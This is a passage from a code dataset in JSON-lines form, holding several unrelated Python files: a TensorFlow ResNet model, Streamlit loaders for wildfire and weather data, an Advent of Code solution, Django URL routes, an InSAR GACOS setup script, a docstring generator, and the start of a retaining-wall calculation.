= 32\n with tf.name_scope(\"Resnet-visit\"):\n with tf.name_scope('stage1'):\n conv = self.conv2d(image, 24, channel, 7, 1)\n bn = tf.layers.batch_normalization(conv, axis=3, training=self.training)\n relu = tf.nn.relu(bn)\n with tf.name_scope('stage2'):\n res = self.residual(relu, [channel, channel//2, channel//2, channel*2], 1, with_shortcut=True)\n with tf.name_scope('stage3'):\n res = self.residual(res, [channel*2, channel, channel, channel*4], 2, with_shortcut=True)\n with tf.name_scope('stage4'):\n res = self.residual(res, [channel*4, channel*2, channel*2, channel*8], 2, with_shortcut=True)\n with tf.name_scope('stage5'):\n res = self.residual(res, [channel*8, channel*4, channel*4, channel*16], 2, with_shortcut=True)\n pool = tf.nn.avg_pool(res, [1, 1, 4, 1], strides=[1, 1, 1, 1], padding='VALID')\n with tf.name_scope('fc'):\n flatten = tf.layers.flatten(pool)\n return flatten\n\n def get_loss(self, output_concat, onehot):\n with tf.name_scope(\"loss\"):\n losses = tf.nn.softmax_cross_entropy_with_logits(logits=output_concat, labels=onehot)\n loss = tf.reduce_mean(losses)\n tf.summary.scalar('loss-concat', loss)\n return loss\n\n def get_num_params(self):\n num_params = 0\n for variable in tf.trainable_variables():\n print(variable)\n shape = variable.get_shape()\n num_params += reduce(mul, [dim.value for dim in shape], 1)\n return num_params\n\n\nif __name__ == '__main__':\n model = MultiModal()\n print(model.get_num_params())\n","repo_name":"czczup/UrbanRegionFunctionClassification","sub_path":"code/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6188,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"32"} +{"seq_id":"16109783829","text":"import streamlit as st\nimport pandas as pd\nimport glob\nimport json\n\n# import sqlite3\nfrom google.oauth2 import service_account\nfrom google.cloud import bigquery\n\n\n@st.cache_resource\ndef connect_gcp():\n credentials = service_account.Credentials.from_service_account_info(\n st.secrets[\"gcp_service_account\"]\n )\n client = bigquery.Client(credentials=credentials)\n\n return client\n\n# load wildfire data from sqlite\n@st.cache_data\ndef load_wildfire_data_local_db(filename='dataset/FPA_FOD_20170508.sqlite'):\n cnx = sqlite3.connect()\n\n df = pd.read_sql_query(\"SELECT fire_year as year, discovery_date as date, state, stat_cause_code, stat_cause_descr as stat_cause, latitude, longitude, fire_size, fire_size_class FROM 'Fires' ORDER BY fire_year, discovery_date\", cnx)\n df['date'] = pd.to_datetime(df['date'] - pd.Timestamp(0).to_julian_date(), unit='D')\n df['incident'] = 1\n df.columns = df.columns.str.lower()\n\n return df\n\n\n# load weather data from csv file\n@st.cache_data\ndef load_wildfire_data_local_csv(filename='dataset/wildfire_data.csv'):\n df = pd.read_csv(filename)\n df['incident'] = 1\n df['datetime'] = pd.to_datetime(df['date'])\n df['date'] = pd.to_datetime(df['datetime'].dt.date)\n\n return df\n\n\n# load wildfire data from google cloud big query\n@st.cache_data\ndef load_wildfire_data_gcp(_client):\n query_job = _client.query(\"SELECT * FROM `vernal-shine-239106.US_Wildfire_Dataset.wildfire`\")\n df = (query_job.result().to_dataframe())\n \n df['incident'] = 1\n df['datetime'] = df['date']\n df['date'] = pd.to_datetime(df['date'].dt.date)\n\n return df\n\n\n# load weather data from visual crossing json files (api export)\n@st.cache_data\ndef load_weather_data_local_json(filename='dataset/weather_vcross/weather_hist_*_*.json'):\n json_files = sorted(glob.glob(filename))\n\n df = None\n for json_file in json_files:\n with open(json_file,'r') as f:\n weather_dict = json.loads(f.read())\n state = json_file.split('_')[2]\n\n if df is None:\n df = pd.json_normalize(weather_dict, record_path=['days'])\n df['region'] = state\n else:\n tmp_df = pd.json_normalize(weather_dict, record_path=['days'])\n tmp_df['region'] = state\n df = pd.concat([df, tmp_df])\n del tmp_df\n\n df.rename(columns={'datetime': 'date'}, inplace=True)\n df['date'] = pd.to_datetime(df['date'])\n\n return df\n\n\n# load weather data csv from noaa (gcp export)\n@st.cache_data\ndef load_weather_data_local_csv(filename='dataset/weather_noaa/weather_data_noaa_*.csv'):\n csv_files = sorted(glob.glob(filename))\n\n df_list = []\n for file in csv_files:\n df = pd.read_csv(file, index_col=None, header=0)\n df_list.append(df)\n\n df = pd.concat(df_list, ignore_index=True)\n df.rename(columns={'state': 'region'}, inplace=True)\n df['date'] = pd.to_datetime(df['date'])\n \n return df\n\n\n# load weather data direct from gcp bigquery noaa dataset\n@st.cache_data\ndef load_weather_data_gcp(_client, from_year=1992, to_year=2015):\n query_stmt = \"SELECT CONCAT(year,'-',mo,'-',da) as date, \\\n country, state as region, AVG(s.lat) lat, AVG(s.lon) lon, COUNT(*) count, \\\n AVG(IF (temp=9999.9, null, temp)) as temp, \\\n AVG(IF (dewp=9999.9, null, dewp)) as dew_point, \\\n AVG(IF (slp=9999.9, null, slp)) as sea_level_pressure, \\\n AVG(IF (stp=9999.9, null, stp)) as station_pressure, \\\n AVG(IF (visib=999.9, null, visib)) as visibility, \\\n AVG(IF (wdsp='999.9', null, CAST(wdsp AS FLOAT64))) as wind_speed, \\\n MAX(IF (mxpsd='999.9', null, CAST(mxpsd AS FLOAT64))) as max_sustained_wind, \\\n MAX(IF (gust=999.9, null, gust)) as max_wind_gust, \\\n MAX(IF (max=9999.9, null, max)) as max_temp, \\\n MIN(IF (min=9999.9, null, min)) as min_temp, \\\n AVG(IF (prcp=99.9, null, prcp)) as precipitation, \\\n AVG(IF (sndp=999.9, null, sndp)) as snow_depth, \\\n MAX(CAST(fog AS INT64)) as fog, \\\n MAX(CAST(rain_drizzle AS INT64)) as rain_drizzle, \\\n MAX(CAST(snow_ice_pellets AS INT64)) as snow_ice_pellets, \\\n MAX(CAST(hail AS INT64)) as hail, \\\n MAX(CAST(thunder AS INT64)) as thunder, \\\n MAX(CAST(tornado_funnel_cloud AS INT64)) as tornado_funnel_cloud \\\n FROM `bigquery-public-data.noaa_gsod.gsod*` w \\\n JOIN `bigquery-public-data.noaa_gsod.stations` s \\\n ON w.stn = s.usaf AND w.wban = s.wban \\\n AND _TABLE_SUFFIX BETWEEN '{}' AND '{}' \\\n AND s.country = 'US' AND state IS NOT NULL \\\n GROUP BY _TABLE_SUFFIX, date, country, state \\\n ORDER BY date, country, state\".format(from_year, to_year)\n\n query_job = _client.query(query_stmt)\n df = (query_job.result().to_dataframe())\n df['date'] = pd.to_datetime(df['date'])\n\n return df\n\n\n# precompute values (lists, ranges) to be used in forms\n@st.cache_data\ndef get_wildfire_lists(df):\n list_fire_size_classes = df['fire_size_class'].sort_values().unique()\n list_states = df['region'].sort_values().unique()\n list_years = df['date'].dt.year.sort_values().astype(str).unique()\n list_causes = df['stat_cause'].sort_values().unique()\n\n return list_fire_size_classes, list_states, list_years, list_causes\n\n\n@st.cache_data\ndef get_wildfire_ranges(df):\n max_fire_size = int(max(df['fire_size'])) + 1\n min_date = min(df['date'])\n max_date = max(df['date'])\n\n return max_fire_size, min_date, max_date\n\n\n@st.cache_data\ndef get_wildfire_size_class_range(max_fire_size):\n # fire size class range based on the values given by the dataset owners\n fire_size_class_range = {\n 'A': (0, 1),\n 'B': (0, 10),\n 'C': (10, 100),\n 'D': (100, 300),\n 'E': (300, 1000),\n 'F': (1000, 5000),\n 'G': (5000, max_fire_size)\n }\n return fire_size_class_range\n\n\n@st.cache_data\ndef get_weather_lists(df):\n list_states = df['region'].sort_values().unique()\n\n return list_states\n\n\ndef load_descriptions(filename):\n with open(filename,'r') as f:\n dict = json.loads(f.read())\n\n return dict\n\n\n@st.cache_data\ndef load_descriptions_shared(filename='input/descr_shared_data.json'):\n return load_descriptions(filename)\n\n\n@st.cache_data\ndef load_descriptions_wildfire(filename='input/descr_wildfire_data.json'):\n return load_descriptions(filename)\n\n\n@st.cache_data\ndef load_descriptions_weather(filename='input/descr_weather_data.json'):\n return load_descriptions(filename)","repo_name":"abigaile-d/wildfire-prediction","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32553557457","text":"from collections import Counter\n\nimport numpy as np\n\n\ndef read_input():\n return np.array([int(x) for x in next(open(\"data/day6.txt\", \"r\")).split(\",\")])\n\n\n# https://dev.to/qviper/advent-of-code-python-solution-day-6-22hl\ndef part_two(fishes_state, days=80):\n count = Counter(fishes_state)\n for _ in range(days):\n # -- Slide count of fish to the previous time key. If\n count = {l: (0 if count.get(l + 1) is None else count.get(l + 1)) for l in range(-1, 8)}\n\n # -- Add new born fish\n count[8] = count[-1]\n\n # -- Reset fish who gave life\n count[6] += count[-1]\n\n # -- Reset exhausted lifes\n count[-1] = 0\n print(sum(count.values()))\n\n\ndef part_one(fishes_state, i=0, days=80):\n if i == days:\n return print(len(fishes_state))\n\n # -- First mask the zeros\n ready_to_give_birth_mask = fishes_state == 0\n\n # --- Replace 0 by 6\n fishes_state[ready_to_give_birth_mask] = 6\n\n # -- Decrease other than old zero (new 6)\n fishes_state[~ready_to_give_birth_mask] -= 1\n\n # -- Create new array of size = original + new born\n fishes_state_ = np.ones(len(fishes_state) + ready_to_give_birth_mask.sum()) * 8\n\n # -- Replace with the value of the old array\n fishes_state_[:fishes_state.size] = fishes_state\n fishes_state = fishes_state_\n\n # -- Recursive call\n part_one(fishes_state, i + 1, days)\n\n\nif __name__ == \"__main__\":\n part_one(read_input(), 0, 80)\n part_two(read_input(), 256)\n","repo_name":"nicolasfeyer/adventofcode-2021","sub_path":"day6/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11039983870","text":"from django.conf.urls import url\n\nfrom views import tagViews\n\nurlpatterns = [\n url(r'^tag', tagViews.tag, name='tag'),\n url(r'^tag/$', tagViews.tag, name='tag'),\n url(r'^tag/?(\\S)$', tagViews.tag, name='tag'),\n url(r'^newTag/$', tagViews.new_tag, name='newTag'),\n url(r'^newTag/?(\\S)$', tagViews.new_tag, name='newTag'),\n url(r'^detailTag/?(\\S)$', tagViews.detail_tag, name='detailTag'),\n url(r'^detailTag/(?P[0-9a-f-]+)$', tagViews.detail_tag, name='detailTag'),\n url(r'^detailTag/(?P[0-9a-f-]+)/?(\\S)$', tagViews.detail_tag, name='detailTag'),\n url(r'^editTag/(?P[0-9a-f-]+)$', tagViews.edit_tag, name='editTag'),\n url(r'^deleteTag/(?P[0-9a-f-]+)$', tagViews.delete_tag, name='deleteTag'),\n]\n","repo_name":"alexandrepasc/TestTcms","sub_path":"urls/tagUrl.py","file_name":"tagUrl.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17026032797","text":"import os, sys\r\nfrom general_set_up_functions import rasterio_basic_functions as rb\r\nfrom general_set_up_functions import general_functions as gf\r\nfrom pathlib import Path\r\n\r\n\r\nclass gacos_set_up():\r\n def __init__(self, asc_name, dsc_name):\r\n self.base_path = Path.cwd().absolute().parent\r\n self.base_path_asc = self.base_path / asc_name\r\n self.base_path_dsc = self.base_path / dsc_name\r\n self.parameter_file_asc = self.base_path_asc / 'Main/Time_Series/platform_parameters.json'\r\n self.parameter_file_dsc = self.base_path_dsc / 'Main/Time_Series/platform_parameters.json'\r\n self.path_2_asc_ztd = self.base_path / 'MSBASv3_Timeseries/asc_ztd'\r\n self.path_2_dsc_ztd = self.base_path / 'MSBASv3_Timeseries/dsc_ztd'\r\n self.asc_file_download_name = self.path_2_asc_ztd / 'asc_downloads.txt'\r\n self.dsc_file_download_name = self.path_2_dsc_ztd / 'dsc_downloads.txt'\r\n self.processed_dirs_asc = [Path(str(x)) for x in\r\n self.base_path_asc.glob('Main/Processed_Data/20*20*/*displacement_VV_rcut_mcoh.tif')]\r\n self.processed_dirs_asc.sort()\r\n self.processed_dirs_dsc = [Path(str(x)) for x in\r\n self.base_path_dsc.glob('Main/Processed_Data/20*20*/*displacement_VV_rcut_mcoh.tif')]\r\n self.processed_dirs_dsc.sort()\r\n self.base_file_asc = self.processed_dirs_asc[0]\r\n self.base_file_dsc = self.processed_dirs_dsc[0]\r\n self.left_asc, self.bottom_asc, self.right_asc, self.top_asc = None, None, None, None\r\n self.left_dsc, self.bottom_dsc, self.right_dsc, self.top_dsc = None, None, None, None\r\n self.time_of_day_asc, self.time_of_day_dsc = None, None\r\n self.asc_dates_list, self.dsc_dates_list = None, None\r\n\r\n def make_dirs(self):\r\n if not self.path_2_asc_ztd.exists():\r\n os.mkdir(self.path_2_asc_ztd)\r\n if not self.path_2_dsc_ztd.exists():\r\n os.mkdir(self.path_2_dsc_ztd)\r\n\r\n def bounds_return(self):\r\n self.left_asc, self.bottom_asc, self.right_asc, self.top_asc = rb.tif_bounds_ztd(self.base_file_asc)\r\n self.left_dsc, self.bottom_dsc, self.right_dsc, self.top_dsc = rb.tif_bounds_ztd(self.base_file_dsc)\r\n\r\n def time_of_day_return(self):\r\n time_of_day_asc, time_of_day_dsc = (gf.open_json_file(self.parameter_file_asc)['startTime'],\r\n gf.open_json_file(self.parameter_file_dsc)['startTime'])\r\n self.time_of_day_asc, self.time_of_day_dsc = (gf.HHMMSS_2_HHMM(time_of_day_asc),\r\n gf.HHMMSS_2_HHMM(time_of_day_dsc))\r\n\r\n def dates_return(self):\r\n self.asc_dates_list, self.dsc_dates_list = (gf.unique_dates(self.processed_dirs_asc),\r\n gf.unique_dates(self.processed_dirs_dsc))\r\n\r\n def write_files(self):\r\n asc_list = [[self.left_asc, self.bottom_asc, self.right_asc, self.top_asc],\r\n [self.time_of_day_asc],\r\n self.asc_dates_list\r\n ]\r\n dsc_list = [[self.left_dsc, self.bottom_dsc, self.right_dsc, self.top_dsc],\r\n [self.time_of_day_dsc],\r\n self.dsc_dates_list]\r\n gf.write_txt_file_gacos(self.asc_file_download_name, asc_list)\r\n gf.write_txt_file_gacos(self.dsc_file_download_name, dsc_list)\r\n\r\n def run_all(self):\r\n self.make_dirs()\r\n self.bounds_return()\r\n self.time_of_day_return()\r\n self.dates_return()\r\n self.write_files()\r\n\r\nif __name__ == '__main__':\r\n sys_index_var_1 = sys.argv[1]\r\n sys_index_var_2 = sys.argv[2]\r\n run_gacos_set_up = gacos_set_up(sys_index_var_1, sys_index_var_2)\r\n run_gacos_set_up.run_all()\r\n\r\n\r\n\r\n","repo_name":"ClayDWoods/Sentinel-1A-B_Processing_Codes","sub_path":"MSBASv3_Timeseries/Main/gacos_setup.py","file_name":"gacos_setup.py","file_ext":"py","file_size_in_byte":3823,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"10589312190","text":"\"\"\"\nThe goal of this file is to auto document\na python file.\nIt looks for every function; Considers the\ninputs. If the inputs to the function are\nall in the varspec.json sheet, then it\nsimply adds the classic documentation.\nIf the inputs aren't, then it raises\nan error and states which input\nwasn't included.\nIt also looks for a custom return string\nright above each function definition.\nThis string looks like '# rets X Y ',\nwhere X and Y would be variable names.\nNormally this should only return one\nthing.\nIf there is already a docstring under\nthe function, then it appends the new documentation\nabove it, within the triple quotation - \nHowever, there must be a way to symbolize\nthat the documentation has already been\nadded and to not duplicate it every time\nthe program is run.\n\"\"\"\n\nimport os\nimport re\nimport logging\nimport json\nimport sys\nimport copy\nfrom validate_types import import_all_types\n\n\n\n\n# rets funcN2vars\ndef get_func_name_to_vars_from_file(python_file_fp):\n func_name_to_locs = get_function_names_starts_and_ends(python_file_fp)\n #print(function_names_to_starts_and_ends)\n funcN2vars = get_func_name_to_variables(func_name_to_locs, \n python_file_fp)\n return funcN2vars\n\n# rets funcN2vars2docstr\ndef create_documentation_args_returns_str(funcN2vars,\n type_spec_d,\n types_cfg_json_fp):\n\n funcN2vars2docstr_l = {}\n for func_name, argsNret_d in funcN2vars.items():\n exchange_d = {}\n for x in [\"Args\", \"Returns\"]:\n func_vars = argsNret_d[x]\n var2docstr_l = {}\n for var in func_vars:\n if var not in type_spec_d:\n raise Exception(f\"Variable {var} from function {func_name}, \" + \\\n f\"group {x}, not in type_spec_d from \" + \\\n f\"file {types_cfg_json_fp}\")\n spec_d = type_spec_d[var]\n if \"subtype\" not in spec_d:\n raise Exception(f\"Variable {var} from function {func_name} \" + \\\n f\" does not have key 'subtype'.\")\n if \"desc\" not in spec_d:\n raise Exception(f\"Variable {var} from function {func_name} \" + \\\n f\" does not have key 'desc'.\")\n docstrs_l = prepare_docstrs_l(var, type_spec_d, 1)\n var2docstr_l[var] = docstrs_l\n exchange_d[x] = var2docstr_l\n\n funcN2vars2docstr_l[func_name] = exchange_d \n return funcN2vars2docstr_l \n\n\n\n\n\n# rets crt_var_list \ndef prepare_docstrs_l(var, type_spec_d, current_num_layer, \n max_num_layers=4, dict_key=None):\n \"\"\"\n Description:\n This recursive function returns either a string or a list,\n depending on the layer number\n # Note, if max_num_layers = -1, then there is no limit to layers.\n If dict_key is not None, then this is a part of a dict\n \"\"\"\n logging.debug(f\"Preparing docstrings list for variable {var}. Layer: {current_num_layer}.\")\n\n # \"\" represents don't print another doc string\n if max_num_layers != -1 and current_num_layer >= max_num_layers:\n return \"\"\n #if var in [\"string\", \"int\", \"float\", \"skip\", \"bool\", \"None\"]:\n # return \"\"\n\n if var not in type_spec_d:\n raise Exception(f\"var {var} missing from type_spec_d\")\n crt_spec_d = type_spec_d[var]\n \n st = crt_spec_d[\"subtype\"]\n if dict_key is not None:\n this_var_doc_str = f\"{dict_key} -> {var} ({st}), {crt_spec_d['desc']}\"\n else:\n this_var_doc_str = f\"{var} ({st}): {crt_spec_d['desc']}\"\n crt_var_list = [this_var_doc_str]\n \n if st in [\"string\", \"int\", \"float\", \"skip\", \"bool\"]:\n if \"restrictions\" in crt_spec_d:\n r_d = crt_spec_d[\"restrictions\"]\n layer_2 = []\n for k, v in r_d.items():\n layer_2.append(f\"Restriction: {k}={v}\")\n crt_var_list.append(layer_2)\n return crt_var_list\n elif st == \"dict\":\n layer_2 = []\n if \"dict_keys\" in crt_spec_d:\n for k, v in crt_spec_d[\"dict_keys\"].items():\n if not check_var_against_type_spec_d(v, type_spec_d):\n raise Exception(f\"Dict keys value {v} not in type_spec_d.\")\n if \"list\" not in v:\n layer_2.append(prepare_docstrs_l(v, type_spec_d, current_num_layer + 1, dict_key=k))\n else:\n list_subtype = (v.split(\"<\")[1]).split(\">\")[0]\n layer_2.append(prepare_docstrs_l(list_subtype, type_spec_d, current_num_layer + 1, dict_key=k))\n\n elif \"dict_spec\" in crt_spec_d:\n k = list(crt_spec_d[\"dict_spec\"].keys())[0]\n v = crt_spec_d[\"dict_spec\"][k]\n if not check_var_against_type_spec_d(k, type_spec_d):\n raise Exception(f\"Dict spec key {k} not in type_spec_d.\")\n if not check_var_against_type_spec_d(v, type_spec_d):\n raise Exception(f\"Dict spec value {v} not in type_spec_d.\")\n layer_2.append(f\"{k} -> {v}\")\n layer_2.append(prepare_docstrs_l(k, type_spec_d, current_num_layer+1))\n if \"list\" not in v:\n layer_2.append(prepare_docstrs_l(v, type_spec_d, current_num_layer + 1))\n else:\n list_subtype = (v.split(\"<\")[1]).split(\">\")[0]\n layer_2.append(prepare_docstrs_l(list_subtype, type_spec_d, current_num_layer + 1))\n elif \"unknown\" in crt_spec_d:\n layer_2.append(f\"Unknown keys (variable input).\")\n else:\n raise Exception(\"No recognized keys in dict spec_d. \" + \\\n \"Must be one of 'dict_keys', 'dict_spec', 'unknown'.\" + \\\n \" Existing keys \" + ', '.join(crt_spec_d.keys()))\n crt_var_list.append(layer_2)\n elif \"list\" in st:\n layer_2 = []\n list_subtype = (st.split(\"<\")[1]).split(\">\")[0]\n if not check_var_against_type_spec_d(list_subtype, type_spec_d):\n raise Exception(f\"List subtype {list_subtype} not in type_spec_d.\")\n layer_2.append(prepare_docstrs_l(list_subtype, type_spec_d, current_num_layer + 1))\n crt_var_list.append(layer_2)\n\n logging.debug(\"For variable {var}, docstrings list is: \")\n logging.debug(crt_var_list)\n return crt_var_list\n\n\ndef check_var_against_type_spec_d(var, type_spec_d):\n # Returns True if good, False if bad\n if \"list\" not in var:\n if var not in type_spec_d:\n return False \n else:\n return True\n else:\n var = (var.split(\"<\")[1]).split(\">\")[0]\n if var not in type_spec_d:\n return False \n else:\n return True\n\n\n\n\n# rets funcN2vars \ndef get_func_name_to_variables(func_name_to_locs, python_file_fp):\n \"\"\"\n Description:\n \n \"\"\"\n \n file_lines = open(python_file_fp).read().split(\"\\n\")\n funcN2vars = {}\n for func_name in func_name_to_locs.keys():\n f_strt = func_name_to_locs[func_name][\"func_start\"]\n f_end = func_name_to_locs[func_name][\"func_end\"]\n func_ret_str = file_lines[f_strt - 1]\n func_def_str = \" \".join(file_lines[f_strt:f_end + 1])\n # Removing multiple spaces\n func_def_str = \" \".join(func_def_str.split())\n # func_vars is a list of strings, each a variable\n func_vars = get_function_variables_from_func_string(func_def_str)\n argsNret_d = {}\n if '' in func_vars:\n func_vars.remove('')\n if len(func_vars) > 0:\n argsNret_d[\"Args\"] = func_vars\n funcN2vars[func_name] = argsNret_d \n\n ret_vars = get_function_return_variables(func_ret_str)\n if '' in ret_vars:\n ret_vars.remove('')\n if len(func_vars) > 0:\n argsNret_d[\"Returns\"] = ret_vars \n funcN2vars[func_name] = argsNret_d \n\n return funcN2vars\n\n# rets variables_list\ndef get_function_return_variables(func_ret_str):\n \"\"\"\n Desc:\n func_ret_str has to have a specific format:\n must look like '# rets {X}'.\n \"\"\"\n #HERE\n if not func_ret_str[:7] == \"# rets \":\n return []\n else:\n real_rets_str = func_ret_str[7:]\n print(real_rets_str)\n split_rets_str = real_rets_str.split(\" \")\n return split_rets_str\n\n\n# rets variables_list \ndef get_function_variables_from_func_string(func_string):\n variables_list = []\n variables_str = \"\".join(func_string.split(\"(\")[1:])\n variables_str = \"\".join(variables_str.split(\")\")[:-1])\n init_variables_list = variables_str.split(\", \")\n for v in init_variables_list:\n if '=' in v:\n variables_list.append(v.split(\"=\")[0])\n else:\n variables_list.append(v.strip())\n\n return variables_list\n\n\n# rets func_name_to_locs\ndef get_function_names_starts_and_ends(python_file_fp):\n\n file_lines = open(python_file_fp).read().split(\"\\n\")\n file_len = len(file_lines)\n func_name_to_locs = {}\n\n for i in range(file_len):\n c_line = file_lines[i]\n if c_line[0:4] == \"def \":\n function_name = re.findall(r\"^\\w+\", c_line[4:])[0]\n logging.debug(f\"found func; name: {function_name} start at row {i}.\")\n func_start = i\n j = 0\n while i + j < file_len:\n next_line = file_lines[i + j]\n # Two seperate regex searches, which one works?\n m = re.search(r'\\):[\\s]*$', next_line)\n if not m:\n j += 1\n else:\n if m:\n logging.debug(\"m found match at line \" + str(i+j))\n func_end = i + j\n if function_name in func_name_to_locs:\n raise Exception(\"Duplicate function name: \" + function_name)\n func_name_to_locs[function_name] = {'func_start': func_start,\n 'func_end': func_end}\n break\n if i + j == file_len:\n print(func_name_to_locs)\n raise Exception(\"File parsing error, reached EOF\")\n\n return func_name_to_locs\n\n\n# rets None \ndef add_docstrings_to_file(python_file_fp, funcN2vars2docstr): \n \"\"\"\n Desc:\n We break out of adding documentation if the flag\n '*DOCDONE' is the first line after the start of\n the function's documentation comment. This way,\n you can update the documentation if the flag\n isn't there.\n \"\"\"\n #HERE\n \n op_fp = os.path.join(os.getcwd(), \"doct_\" + os.path.basename(python_file_fp))\n if os.path.isfile(op_fp):\n raise Exception(\"Output file exists at \" + op_fp)\n\n func_name_to_locs = get_function_names_starts_and_ends(python_file_fp)\n\n end_to_func_name = {func_name_to_locs[x][\"func_end\"]:x for x in func_name_to_locs.keys()}\n\n file_lines = open(python_file_fp).read().split(\"\\n\")\n\n op_file_str_lines = []\n spacer = \" \"*4\n for i in range(len(file_lines)):\n op_file_str_lines.append(file_lines[i])\n if i in end_to_func_name:\n # Checking if documentation is needed\n next_line = file_lines[i+1]\n if '\"\"\"' in next_line:\n if '*DOCDONE' in file_lines[i+2]:\n continue\n func_name = end_to_func_name[i]\n if func_name not in funcN2vars2docstr:\n continue \n vars_d = funcN2vars2docstr[func_name]\n op_file_str_lines.append(spacer + '\"\"\"')\n op_file_str_lines.append(spacer + '*DOCDONE')\n op_file_str_lines.append(spacer + \"Args:\")\n args_d = vars_d[\"Args\"]\n for var, var_docstrs_l in args_d.items():\n logging.debug(f\"Working on var {var}.\")\n generate_docstr_from_docstr_l(var_docstrs_l, spacer,\n 2, op_file_str_lines)\n op_file_str_lines.append(spacer + \"Returns:\")\n rets_d = vars_d[\"Returns\"]\n for var, var_docstrs_l in rets_d.items():\n logging.debug(f\"Working on var {var}.\")\n generate_docstr_from_docstr_l(var_docstrs_l, spacer,\n 2, op_file_str_lines)\n\n op_file_str_lines.append(spacer + '\"\"\"')\n #logging.info(f\"Function {func_name} found at line {i}.\")\n\n with open(op_fp, \"w\") as g:\n g.write(\"\\n\".join(op_file_str_lines))\n\n logging.info(f\"Wrote output file to {op_fp}\")\n\n return None\n\n\ndef generate_docstr_from_docstr_l(docstr_l, spacer, num_depth, op_file_str_lines):\n # docstr_l is a list in which each item is either a string or a docstring list\n # Every time this runs, it adds a line to the op_file_str_lines list.\n if num_depth >= 10:\n print(docstr_l)\n with open(\"ErrorFile.txt\", \"w\") as g:\n g.write('\\n'.join(op_file_str_lines))\n raise Exception(\"Docstring depth exceeds 10 - possible loop issue.\")\n \n for x in docstr_l:\n if isinstance(x, str):\n if x != \"\":\n op_file_str_lines.append(spacer*num_depth + x)\n elif isinstance(x, list):\n generate_docstr_from_docstr_l(x, spacer, num_depth + 1, op_file_str_lines)\n\n\n\n\n \ndef test_1(types_cfg_json_fp, python_file_fp):\n\n type_spec_d = import_all_types(types_cfg_json_fp)\n\n\n\ndef test_3(types_cfg_json_fp, python_file_fp):\n type_spec_d = import_all_types(types_cfg_json_fp)\n funcN2vars = get_func_name_to_vars_from_file(python_file_fp)\n funcN2vars2docstr = create_documentation_args_returns_str(funcN2vars,\n type_spec_d,\n types_cfg_json_fp)\n\n add_docstrings_to_file(python_file_fp, funcN2vars2docstr)\n #print(func_names_to_doc_strings)\n\n\n\n\ndef test_2(python_file_fp):\n get_functions_info_from_file(python_file_fp)\n \n\n\ndef main():\n args = sys.argv\n logging.basicConfig(level=logging.DEBUG)\n help_str = \"python3 document_with_types.py types_cfg_json_fp python_file_fp 1\"\n help_str += \"\\nOR\\n\" \n help_str += \"python3 document_with_types.py python_file_fp 2\"\n help_str += \"\\nOR\\n\" \n help_str += \"python3 document_with_types.py types_cfg_json_fp python_file_fp 3\"\n\n if args[-1] not in [\"1\", \"2\", \"3\"]:\n print(\"Not running.\")\n print(help_str)\n sys.exit(1)\n elif args[-1] == \"1\":\n types_cfg_json_fp = args[1]\n python_file_fp = args[2]\n test_1(types_cfg_json_fp, python_file_fp)\n sys.exit(0)\n elif args[-1] == \"2\":\n python_file_fp = args[1]\n test_2(python_file_fp)\n sys.exit(0)\n elif args[-1] == \"3\":\n types_cfg_json_fp = args[1]\n python_file_fp = args[2]\n test_3(types_cfg_json_fp, python_file_fp)\n sys.exit(0)\n else:\n print(help_str)\n sys.exit(1)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"OGalOz/auto_docval","sub_path":"samples/clear_doc_w_types.py","file_name":"clear_doc_w_types.py","file_ext":"py","file_size_in_byte":15147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25825046995","text":"# -*- coding: utf-8 -*-\n''' Retaining wall calculation verification test. Inspired on the \"A.4 worked example to accompany Chapter 4\" of the publication: Eurocode 7: Geotechnical Design Worked examples. Worked examples presented at the Workshop “Eurocode 7: Geotechnical Design” Dublin, 13-14 June, 2013.\n\nhttps://publications.jrc.ec.europa.eu/repository/handle/JRC85029\n'''\n\nfrom __future__ import division\nfrom __future__ import print_function\n\n__author__= \"Luis C. Pérez Tato (LCPT)\"\n__copyright__= \"Copyright 2023, LCPT\"\n__license__= \"GPL\"\n__version__= \"3.0\"\n__email__= \"l.pereztato@gmail.com\"\n\nimport os\nimport math\nimport geom\nimport xc\nfrom scipy.constants import g\nfrom materials.ec2 import EC2_materials\nfrom rough_calculations import ng_retaining_wall\nfrom actions import load_cases\nfrom actions import combinations\nfrom geotechnics import earth_pressure as ep\nfrom geotechnics import frictional_cohesive_soil as fcs\nfrom actions.earth_pressure import earth_pressure\n\n\n\n# __ __ _ _ _ \n# \\ \\ / /_ _| | | __ _ ___ ___ _ __ ___| |_ _ _ _ _ \n# \\ \\/\\/ / _` | | | / _` / -_) _ \\ ' \\/ -_) _| '_| || |\n# \\_/\\_/\\__,_|_|_| \\__, \\___\\___/_|_|_\\___|\\__|_| \\_, |\n# |___/ |__/ \n#\n# /+\n# / | V\n# / | i\n# Backfill slope -> / | r \n# / | t\n# zTopWall --- / | u\n# | | | a\n# | | | l\n# | | |\n# | | | b\n# | | | a\n# | | | c\n# | | | k\n# +---- ------------+ <- zTopFooting\n# |Toe Heel |\n# +-------------------+\n#\n\n# Wall geometry\nretainedHeight= 6.0\nzTopWall= retainedHeight\n\n## Stem\nstemTopWidth= 0.70 # width of the wall at its top.\nstemBottomWidth= stemTopWidth # width of the wall at its bottom.\n\n## Foundation.\nfootingWidth= 3.9 # overall breadth of the base.\nfootingThickness= 0.8 # thickness of the footing.\nbToe= 0.95 # width of the toe.\nbHeel= footingWidth-stemBottomWidth-bToe\n\n# __ __ _ _ _ \n# | \\/ |__ _| |_ ___ _ _(_)__ _| |___\n# | |\\/| / _` | _/ -_) '_| / _` | (_-<\n# |_| |_\\__,_|\\__\\___|_| |_\\__,_|_/__/\n\n# Partial factors (M1)\ngammaMPhiM1= 1.0\n\n# Granular fill.\nslopeOfBackfillSurface= math.radians(20)\n## Design approach 2 (A1+M1+R2).\ngranularFillM1= 